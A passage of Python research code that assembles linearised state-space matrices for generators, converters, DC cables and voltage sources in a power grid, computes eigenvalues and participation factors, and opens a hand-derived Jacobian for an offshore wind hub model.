C_tilde[model.x_ind:model.x_ind + model.nx, mf.x_ind:mf.x_ind + mf.nx] = bcb[:, [0]] @ cvsc
C_tilde[model.x_ind:model.x_ind + model.nx, mt.x_ind:mt.x_ind + mt.nx] = bcb[:, [1]] @ cvsc
elif model.type == ModelType.VS:
# break
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
uo = np.array([vx, vy])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
avs, bvs, cvs, dvs = vs_linear(xo, uo, model)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = avs
B_tilde[model.x_ind:model.x_ind + model.nx, idx:idx + 2] = bvs
B_tilde[idx:idx + 2, idx:idx + 2] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ dvs
C_tilde[idx:idx + 2, model.x_ind:model.x_ind + model.nx] = bn[bus_idx:bus_idx + 2,
bus_idx:bus_idx + 2] @ cvs
Amat = A_tilde + B_tilde + C_tilde
lambda_1, Phi_1 = np.linalg.eig(Amat)
# Set eigenvalues smaller than the tolerance to zero
lambda_1[abs(np.real(lambda_1)) < tol] = 0
Psi_1 = np.linalg.inv(Phi_1)
P_1 = Phi_1 * Psi_1.T
# Set Zero mode eigenvalues to zero # TODO need to confirm that this is ok!
zm = np.where(abs(P_1) > 1.1)[0]
lambda_1[zm] = 0
return lambda_1, P_1, Amat
def calc_state_matrix(x0, npr, models, tol=1e-6):
"""
Parameters
----------
x0 : ndarray
Initial state vector.
npr : network_parameters
Object containing network parameters.
models : list
List of models.
Returns
-------
System A matrix.
"""
inw = npr.x_ind
n_vsc = 0
n_gen = 0
size = (len(x0), len(x0))
A_tilde = np.zeros(size)
B_tilde = np.zeros(size)
C_tilde = np.zeros(size)
an, bn, cn, dn = network_linear(npr)
A_tilde[inw:, inw:] = an
for model in models:
if model.type == ModelType.VSC_1:
# break
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
if not model.x_dc == -1:
vdc = x0[model.x_dc]
else:
vdc = 1
Theta_pll = x0[model.x_ind + model.x_idx['Theta']]
vd = vx * np.cos(Theta_pll) + vy * np.sin(Theta_pll)
vq = -vx * np.sin(Theta_pll) + vy * np.cos(Theta_pll)
uo = np.array([vd, vq, vdc])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
# if model.ctrl == CtrlMode.P_Vac:
# avsc,bacvsc,bdcvsc,cacvsc,cdcvsc,dvsc = vsc_linear_1(xo,uo,model)
# # A,B,Bvdc,C,Cdc,D
# # break
# # B_tilde[model.x_ind:model.x_ind+model.nx,model.x_dc:model.x_dc+1]=bdcvsc # TODO add DC side
# # C_tilde[idx:idx+1,model.x_ind:model.x_ind+model.nx]=bdcvsc
# elif model.ctrl == CtrlMode.Vdc_Q:
# avsc,bacvsc,bdcvsc,cacvsc,cdcvsc,dvsc = vsc_linear_2(xo,uo,model)
# elif 'Idc' in model.x_idx:
# avsc,bacvsc,cacvsc,dvsc = converter_linear(xo,uo,model)
# else:
# # avsc,bvsc,cvsc,dvsc = converter_linear(xo,uo,model)
# avsc,bacvsc,cacvsc,dvsc = c_linear0(xo,uo,model)
# avsc,bacvsc,cacvsc,dvsc = converter_linear(xo,uo,model)
avsc, bacvsc, cacvsc, dvsc = model.abcd_linear(xo, uo)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = avsc
B_tilde[model.x_ind:model.x_ind + model.nx, idx:idx + 2] = bacvsc
B_tilde[idx:idx + 2, idx:idx + 2] = bn[model.bus_ind:model.bus_ind + 2,
model.bus_ind:model.bus_ind + 2] @ dvsc
C_tilde[idx:idx + 2, model.x_ind:model.x_ind + model.nx] = bn[bus_idx:bus_idx + 2,
bus_idx:bus_idx + 2] @ cacvsc
# B_tilde[model.x_ind:model.x_ind+model.nx,inw:] = bacvsc@cn[bus_idx:bus_idx+2] # XXX alternative way
# if not model.x_dc == -1:
# B_tilde[model.x_ind:model.x_ind+model.nx,[model.x_dc]]=bdcvsc
n_vsc += 1
elif model.type == ModelType.GEN_ORD_6:
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
d = x0[model.x_ind + model.x_idx['d']]
vd = vx * np.cos(d) + vy * np.sin(d)
vq = -vx * np.sin(d) + vy * np.cos(d)
uo = np.array([vd, vq])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
ag, bg, cg, dg = sixth_order_model_avr(xo, uo, model)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = ag
B_tilde[model.x_ind:model.x_ind + model.nx, idx:idx + 2] = bg
B_tilde[idx:idx + 2, idx:idx + 2] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ dg
C_tilde[idx:idx + 2, model.x_ind:model.x_ind + model.nx] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ cg
n_gen += 1
elif model.type == ModelType.GEN_2_2:
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
d = x0[model.x_ind + model.x_idx['d']]
vd = vx * np.cos(d) + vy * np.sin(d)
vq = -vx * np.sin(d) + vy * np.cos(d)
uo = np.array([vd, vq])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
# ag,bg,cg,dg = standard_model_linear(xo,uo,model)
ag, bg, cg, dg = model.abcd_linear(xo, uo)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = ag
B_tilde[model.x_ind:model.x_ind + model.nx, idx:idx + 2] = bg
B_tilde[idx:idx + 2, idx:idx + 2] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ dg
C_tilde[idx:idx + 2, model.x_ind:model.x_ind + model.nx] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ cg
n_gen += 1
elif model.type == ModelType.DC_LINE:
# break
mf = models[model.f]
mt = models[model.t]
If = -x0[mf.x_ind + mf.x_idx['Idc']] * mf.Sn / npr.Sb
It = x0[mt.x_ind + mt.x_idx['Idc']] * mt.Sn / npr.Sb
It = -If # TODO check the initialization. In steady state If=-It (if G=0)
uo = np.array([If, It])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
acb, bcb, ccb, dcb = dc_cable_linear(xo, uo, model)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = acb
# cvsc[np.array([0,1]),np.array([mf.x_idx['Idc'],mt.x_idx['Idc']])]
# B_tilde[model.x_ind:model.x_ind+model.nx,idx:idx+2]=bcb
# B_tilde[idx:idx+2,idx:idx+2]=bn[bus_idx:bus_idx+2,bus_idx:bus_idx+2]@dcb
cvsc = np.zeros((1, mf.nx))
cvsc[0, mf.x_idx['Idc']] = 1
C_tilde[model.x_ind:model.x_ind + model.nx, mf.x_ind:mf.x_ind + mf.nx] = bcb[:, [0]] @ cvsc
C_tilde[model.x_ind:model.x_ind + model.nx, mt.x_ind:mt.x_ind + mt.nx] = bcb[:, [1]] @ cvsc
elif model.type == ModelType.VS:
# break
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
uo = np.array([vx, vy])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
avs, bvs, cvs, dvs = vs_linear(xo, uo, model)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = avs
B_tilde[model.x_ind:model.x_ind + model.nx, idx:idx + 2] = bvs
B_tilde[idx:idx + 2, idx:idx + 2] = bn[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] @ dvs
C_tilde[idx:idx + 2, model.x_ind:model.x_ind + model.nx] = bn[bus_idx:bus_idx + 2,
bus_idx:bus_idx + 2] @ cvs
Amat = A_tilde + B_tilde + C_tilde
return Amat
def calc_eigenvalues_test(x0, npr, models, tol=1e-6):
inw = npr.x_ind
# n_vsc = 0
# n_gen = 0
size = (len(x0), len(x0))
Nm = sum([m.nx for m in models])
Nb = npr.n_bus
Nbr = npr.n_br
Nn = 2 * Nb + 2 * Nbr
A_tilde = np.zeros((Nm, Nm))
B_tilde = np.zeros((Nm, 2 * Nb))
C_tilde = np.zeros((2 * Nb, Nm))
D_tilde = np.zeros((2 * Nb, Nn))
for model in models:
if model.type == ModelType.VSC_1:
# break
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
if not model.x_dc == -1:
vdc = x0[model.x_dc]
else:
vdc = 1
Theta_pll = x0[model.x_ind + model.x_idx['Theta']]
vd = vx * np.cos(Theta_pll) + vy * np.sin(Theta_pll)
vq = -vx * np.sin(Theta_pll) + vy * np.cos(Theta_pll)
uo = np.array([vd, vq, vdc])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
# if model.ctrl == CtrlMode.P_Vac:
# avsc,bacvsc,bdcvsc,cacvsc,cdcvsc,dvsc = vsc_linear_1(xo,uo,model)
# # A,B,Bvdc,C,Cdc,D
# # break
# # B_tilde[model.x_ind:model.x_ind+model.nx,model.x_dc:model.x_dc+1]=bdcvsc # TODO add DC side
# # C_tilde[idx:idx+1,model.x_ind:model.x_ind+model.nx]=bdcvsc
# elif model.ctrl == CtrlMode.Vdc_Q:
# avsc,bacvsc,bdcvsc,cacvsc,cdcvsc,dvsc = vsc_linear_2(xo,uo,model)
# elif 'Idc' in model.x_idx:
# avsc,bacvsc,cacvsc,dvsc = converter_linear(xo,uo,model)
# else:
# # avsc,bvsc,cvsc,dvsc = converter_linear(xo,uo,model)
am, bm, cm, dm = c_linear0(xo, uo, model)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = am
B_tilde[model.x_ind:model.x_ind + model.nx, bus_idx:bus_idx + 2] = bm
C_tilde[bus_idx:bus_idx + 2, model.x_ind:model.x_ind + model.nx] = cm
D_tilde[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] = dm
# print(model,cacvsc@xo)
# B_tilde[model.x_ind:model.x_ind+model.nx,inw:] = bacvsc@cn[bus_idx:bus_idx+2] # XXX alternative way
# if not model.x_dc == -1:
# B_tilde[model.x_ind:model.x_ind+model.nx,[model.x_dc]]=bdcvsc
# n_vsc += 1
elif model.type == ModelType.GEN_ORD_6:
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
d = x0[model.x_ind + model.x_idx['d']]
vd = vx * np.cos(d) + vy * np.sin(d)
vq = -vx * np.sin(d) + vy * np.cos(d)
uo = np.array([vd, vq])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
am, bm, cm, dm = sixth_order_model_avr(xo, uo, model)
# A_tilde[model.x_ind:model.x_ind+model.nx,model.x_ind:model.x_ind+model.nx]=ag
# B_tilde[model.x_ind:model.x_ind+model.nx,idx:idx+2]=bg
# B_tilde[idx:idx+2,idx:idx+2]=bn[bus_idx:bus_idx+2,bus_idx:bus_idx+2]@dg
# C_tilde[idx:idx+2,model.x_ind:model.x_ind+model.nx] = bn[bus_idx:bus_idx+2,bus_idx:bus_idx+2]@cg
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = am
B_tilde[model.x_ind:model.x_ind + model.nx, bus_idx:bus_idx + 2] = bm
C_tilde[bus_idx:bus_idx + 2, model.x_ind:model.x_ind + model.nx] = cm
D_tilde[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] = dm
# n_gen += 1
elif model.type == ModelType.GEN_2_2:
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
d = x0[model.x_ind + model.x_idx['d']]
vd = vx * np.cos(d) + vy * np.sin(d)
vq = -vx * np.sin(d) + vy * np.cos(d)
uo = np.array([vd, vq])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
am, bm, cm, dm = standard_model_linear(xo, uo, model)
# A_tilde[model.x_ind:model.x_ind+model.nx,model.x_ind:model.x_ind+model.nx]=ag
# B_tilde[model.x_ind:model.x_ind+model.nx,idx:idx+2]=bg
# B_tilde[idx:idx+2,idx:idx+2]=bn[bus_idx:bus_idx+2,bus_idx:bus_idx+2]@dg
# C_tilde[idx:idx+2,model.x_ind:model.x_ind+model.nx] = bn[bus_idx:bus_idx+2,bus_idx:bus_idx+2]@cg
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = am
B_tilde[model.x_ind:model.x_ind + model.nx, bus_idx:bus_idx + 2] = bm
C_tilde[bus_idx:bus_idx + 2, model.x_ind:model.x_ind + model.nx] = cm
D_tilde[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] = dm
# n_gen += 1
# print(model,cg@xo)
elif model.type == ModelType.DC_LINE:
# break
mf = models[model.f]
mt = models[model.t]
If = -x0[mf.x_ind + mf.x_idx['Idc']] * mf.Sn / npr.Sb
It = x0[mt.x_ind + mt.x_idx['Idc']] * mt.Sn / npr.Sb
It = -If # TODO check the initialization. In steady state If=-It (if G=0)
uo = np.array([If, It])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
am, bm, cm, dm = dc_cable_linear(xo, uo, model)
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = am
# cvsc[np.array([0,1]),np.array([mf.x_idx['Idc'],mt.x_idx['Idc']])]
# B_tilde[model.x_ind:model.x_ind+model.nx,idx:idx+2]=bcb
# B_tilde[idx:idx+2,idx:idx+2]=bn[bus_idx:bus_idx+2,bus_idx:bus_idx+2]@dcb
cm = np.zeros((1, mf.nx))
cm[0, mf.x_idx['Idc']] = 1
C_tilde[model.x_ind:model.x_ind + model.nx, mf.x_ind:mf.x_ind + mf.nx] = bm[:, [0]] @ cm
C_tilde[model.x_ind:model.x_ind + model.nx, mt.x_ind:mt.x_ind + mt.nx] = bm[:, [1]] @ cm
elif model.type == ModelType.VS:
# break
bus_idx = model.bus_ind * 2
idx = inw + bus_idx
vx = x0[idx]
vy = x0[idx + 1]
uo = np.array([vx, vy])
xo = x0[np.arange(model.x_ind, model.x_ind + model.nx)]
am, bm, cm, dm = vs_linear(xo, uo, model)
# A_tilde[model.x_ind:model.x_ind+model.nx,model.x_ind:model.x_ind+model.nx]=avs
# B_tilde[model.x_ind:model.x_ind+model.nx,idx:idx+2]=bvs
# B_tilde[idx:idx+2,idx:idx+2]=bn[bus_idx:bus_idx+2,bus_idx:bus_idx+2]@dvs
# C_tilde[idx:idx+2,model.x_ind:model.x_ind+model.nx] = bn[bus_idx:bus_idx+2,bus_idx:bus_idx+2]@cvs
A_tilde[model.x_ind:model.x_ind + model.nx, model.x_ind:model.x_ind + model.nx] = am
B_tilde[model.x_ind:model.x_ind + model.nx, bus_idx:bus_idx + 2] = bm
C_tilde[bus_idx:bus_idx + 2, model.x_ind:model.x_ind + model.nx] = cm
D_tilde[bus_idx:bus_idx + 2, bus_idx:bus_idx + 2] = dm
an, bn, cn, dn = network_linear(npr)
Im = np.zeros(2 * npr.n_bus)
Ib = np.zeros(npr.n_bus, dtype=complex)
for model in models:
if model.type == ModelType.gen_standard:
th = x0[model.x_ind + model.x_idx['d']]
else:
th = x0[model.x_ind + model.x_idx['Theta']]
Id = x0[model.x_ind + model.x_idx['Id']]
Iq = x0[model.x_ind + model.x_idx['Iq']]
Ix = (Id * np.cos(th) - Iq * np.sin(th)) * model.Sn / npr.Sb
Iy = (Id * np.sin(th) + Iq * np.cos(th)) * model.Sn / npr.Sb
Im[2 * model.bus_ind] += Ix
Im[2 * model.bus_ind + 1] += Iy
Ib[model.bus_ind] += Ix + 1j * Iy
# xm = x0[:inw]
# xn = x0[inw:]
# cn@xn+dn@Im
# cn@xn+dn@(C_tilde@xm+D_tilde@xn)
# C_tilde@xm-Im
Amat = np.vstack([np.hstack([A_tilde, B_tilde @ cn]),
np.hstack([bn @ C_tilde, an + bn @ D_tilde])])
return Amat
def nswph_linear(x0, u, npr, off, wf, gpr):
delta = x0[gpr.x_idx['d']]
e_dpp = x0[gpr.x_idx['Edpp']]
e_qpp = x0[gpr.x_idx['Eqpp']]
Idw = x0[gpr.nx + wf.x_idx['Id']]
Iqw = x0[gpr.nx + wf.x_idx['Iq']]
thetaw = x0[gpr.nx + wf.x_idx['Theta']]
# Mpll = x0[7]
# ilx = x0[12]
# ily = x0[13]
# vd = x0[14]
# vq = x0[15]
Ido = x0[gpr.nx + wf.nx + off.x_idx['Id']]
Iqo = x0[gpr.nx + wf.nx + off.x_idx['Iq']]
thetao = x0[gpr.nx + wf.nx + off.x_idx['Theta']]
inw = npr.x_ind
voffx = x0[inw + 0]
voffy = x0[inw + 1]
vscx = x0[inw + 2]
vscy = x0[inw + 3]
vtfwx = x0[inw + 4]
vtfwy = x0[inw + 5]
vwfx = x0[inw + 6]
vwfy = x0[inw + 7]
Csc = 0.01
Chub = 0.01
Lcb = 0.002103529614325069
Rcb = 0.0014730639731404956
Ccb = 0.4269650611647936 / 2
Ltsc = 0.15 / 3
Rtsc = 0.01 / 3
Ltwf = 0.15 / 8
Rtwf = 0.01 / 8
A = np.array([[0, npr.wn, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[(-gpr.ra * ((-2 * gpr.ra * (-vscx * np.sin(delta) + vscy * np.cos(delta)) - 2 * gpr.xqpp * (
-vscx * np.cos(delta) - vscy * np.sin(delta))) * (-gpr.ra * (
-e_dpp + vscx * np.cos(delta) + vscy * np.sin(delta)) - gpr.xqpp * (
-e_qpp - vscx * np.sin(
delta) + vscy * np.cos(
delta))) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) ** 2 + (-2 * gpr.ra * (
-vscx * np.cos(delta) - vscy * np.sin(delta)) + 2 * gpr.xdpp * (-vscx * np.sin(
delta) + vscy * np.cos(delta))) * (-gpr.ra * (
-e_qpp - vscx * np.sin(delta) + vscy * np.cos(delta)) + gpr.xdpp * (
-e_dpp + vscx * np.cos(delta) + vscy * np.sin(
delta))) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) ** 2) - (
-gpr.ra * (-vscx * np.sin(delta) + vscy * np.cos(delta)) - gpr.xqpp * (
-vscx * np.cos(delta) - vscy * np.sin(delta))) * (
vscx * np.cos(delta) + vscy * np.sin(delta)) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (
-gpr.ra * (-vscx * np.cos(delta) - vscy * np.sin(delta)) + gpr.xdpp * (
-vscx * np.sin(delta) + vscy * np.cos(delta))) * (
-vscx * np.sin(delta) + vscy * np.cos(delta)) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (
-gpr.ra * (-e_dpp + vscx * np.cos(delta) + vscy * np.sin(delta)) - gpr.xqpp * (
-e_qpp - vscx * np.sin(delta) + vscy * np.cos(delta))) * (
-vscx * np.sin(delta) + vscy * np.cos(delta)) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (
-gpr.ra * (-e_qpp - vscx * np.sin(delta) + vscy * np.cos(delta)) + gpr.xdpp * (
-e_dpp + vscx * np.cos(delta) + vscy * np.sin(delta))) * (
-vscx * np.cos(delta) - vscy * np.sin(delta)) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / gpr.Tj, -gpr.D / gpr.Tj, 0, (-gpr.ra * (
2 * gpr.ra * (
-gpr.ra * (-e_qpp - vscx * np.sin(delta) + vscy * np.cos(delta)) + gpr.xdpp * (
-e_dpp + vscx * np.cos(delta) + vscy * np.sin(delta))) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) ** 2 + 2 * gpr.xqpp * (-gpr.ra * (
-e_dpp + vscx * np.cos(delta) + vscy * np.sin(delta)) - gpr.xqpp * (
-e_qpp - vscx * np.sin(
delta) + vscy * np.cos(
delta))) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) ** 2) - gpr.ra * (-vscx * np.sin(
delta) + vscy * np.cos(delta)) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - gpr.xqpp * (vscx * np.cos(
delta) + vscy * np.sin(delta)) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / gpr.Tj, 0, (-gpr.ra * (
2 * gpr.ra * (
-gpr.ra * (-e_dpp + vscx * np.cos(delta) + vscy * np.sin(delta)) - gpr.xqpp * (
-e_qpp - vscx * np.sin(delta) + vscy * np.cos(delta))) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) ** 2 - 2 * gpr.xdpp * (-gpr.ra * (
-e_qpp - vscx * np.sin(delta) + vscy * np.cos(delta)) + gpr.xdpp * (
-e_dpp + vscx * np.cos(
delta) + vscy * np.sin(
delta))) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) ** 2) - gpr.ra * (vscx * np.cos(
delta) + vscy * np.sin(delta)) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) + gpr.xdpp * (-vscx * np.sin(
delta) + vscy * np.cos(delta)) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / gpr.Tj, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, (-gpr.ra * ((
-gpr.ra * (
-e_dpp + vscx * np.cos(
delta) + vscy * np.sin(
delta)) - gpr.xqpp * (
-e_qpp - vscx * np.sin(
delta) + vscy * np.cos(
delta))) * (
-2 * gpr.ra * np.cos(
delta) + 2 * gpr.xqpp * np.sin(
delta)) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) ** 2 + (
-gpr.ra * (
-e_qpp - vscx * np.sin(
delta) + vscy * np.cos(
delta)) + gpr.xdpp * (
-e_dpp + vscx * np.cos(
delta) + vscy * np.sin(
delta))) * (
2 * gpr.ra * np.sin(
delta) + 2 * gpr.xdpp * np.cos(
delta)) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) ** 2) - (
-gpr.ra * (
-e_dpp + vscx * np.cos(
delta) + vscy * np.sin(
delta)) - gpr.xqpp * (
-e_qpp - vscx * np.sin(
delta) + vscy * np.cos(
delta))) * np.cos(
delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) + (-gpr.ra * (
-e_qpp - vscx * np.sin(delta) + vscy * np.cos(delta)) + gpr.xdpp * (
-e_dpp + vscx * np.cos(
delta) + vscy * np.sin(delta))) * np.sin(
delta) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (gpr.ra * np.sin(delta) + gpr.xdpp * np.cos(
delta)) * (-vscx * np.sin(delta) + vscy * np.cos(delta)) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (
-gpr.ra * np.cos(
delta) + gpr.xqpp * np.sin(
delta)) * (
vscx * np.cos(
delta) + vscy * np.sin(
delta)) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / gpr.Tj,
(-gpr.ra * ((-gpr.ra * (-e_dpp + vscx * np.cos(delta) + vscy * np.sin(delta)) - gpr.xqpp * (
-e_qpp - vscx * np.sin(delta) + vscy * np.cos(delta))) * (
-2 * gpr.ra * np.sin(delta) - 2 * gpr.xqpp * np.cos(delta)) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) ** 2 + (-gpr.ra * (
-e_qpp - vscx * np.sin(delta) + vscy * np.cos(delta)) + gpr.xdpp * (
-e_dpp + vscx * np.cos(
delta) + vscy * np.sin(
delta))) * (
-2 * gpr.ra * np.cos(delta) + 2 * gpr.xdpp * np.sin(delta)) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) ** 2) - (
-gpr.ra * (-e_dpp + vscx * np.cos(delta) + vscy * np.sin(delta)) - gpr.xqpp * (
-e_qpp - vscx * np.sin(delta) + vscy * np.cos(delta))) * np.sin(delta) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (
-gpr.ra * (-e_qpp - vscx * np.sin(delta) + vscy * np.cos(delta)) + gpr.xdpp * (
-e_dpp + vscx * np.cos(delta) + vscy * np.sin(delta))) * np.cos(delta) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (
-gpr.ra * np.sin(delta) - gpr.xqpp * np.cos(delta)) * (
vscx * np.cos(delta) + vscy * np.sin(delta)) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - (
-gpr.ra * np.cos(delta) + gpr.xdpp * np.sin(delta)) * (
-vscx * np.sin(delta) + vscy * np.cos(delta)) / (
gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)) / gpr.Tj, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, -gpr.kd / gpr.Tdp, (gpr.kd - 1) / gpr.Tdp, 0, 0, 1 / gpr.Tdp, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[-(gpr.xdp - gpr.xdpp) * (-gpr.ra * (-vscx * np.sin(delta) + vscy * np.cos(delta)) - gpr.xqpp * (
-vscx * np.cos(delta) - vscy * np.sin(delta))) / (
gpr.Tdpp * (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)), 0, 1 / gpr.Tdpp,
(-gpr.xqpp * (gpr.xdp - gpr.xdpp) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - 1) / gpr.Tdpp, 0,
-gpr.ra * (gpr.xdp - gpr.xdpp) / (gpr.Tdpp * (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)), 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
-(gpr.xdp - gpr.xdpp) * (-gpr.ra * np.cos(delta) + gpr.xqpp * np.sin(delta)) / (
gpr.Tdpp * (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)),
-(gpr.xdp - gpr.xdpp) * (-gpr.ra * np.sin(delta) - gpr.xqpp * np.cos(delta)) / (
gpr.Tdpp * (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, -gpr.kq / gpr.Tqp, (gpr.kq - 1) / gpr.Tqp, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[(gpr.xqp - gpr.xqpp) * (-gpr.ra * (-vscx * np.cos(delta) - vscy * np.sin(delta)) + gpr.xdpp * (
-vscx * np.sin(delta) + vscy * np.cos(delta))) / (
gpr.Tqpp * (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)), 0, 0,
gpr.ra * (gpr.xqp - gpr.xqpp) / (gpr.Tqpp * (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)), 1 / gpr.Tqpp,
(-gpr.xdpp * (gpr.xqp - gpr.xqpp) / (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp) - 1) / gpr.Tqpp, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
(gpr.xqp - gpr.xqpp) * (gpr.ra * np.sin(delta) + gpr.xdpp * np.cos(delta)) / (
gpr.Tqpp * (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)),
(gpr.xqp - gpr.xqpp) * (-gpr.ra * np.cos(delta) + gpr.xdpp * np.sin(delta)) / (
gpr.Tqpp * (gpr.ra ** 2 + gpr.xdpp * gpr.xqpp)), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, -1 / gpr.Te, -gpr.Kc / gpr.Te, gpr.Kc / (gpr.Tc * gpr.Te), 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0],
[0, 0, 0, 0, 0, 0, 0, -1 / gpr.Tm, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, vscx / (gpr.Tm * np.sqrt(vscx ** 2 + vscy ** 2)),
vscy / (gpr.Tm * np.sqrt(vscx ** 2 + vscy ** 2)), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, -1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, npr.wn * (-wf.Kpc - wf.Rt) / wf.Lt, 0, npr.wn * wf.Kic / wf.Lt, 0,
npr.wn / wf.Lt, 0, npr.wn * (
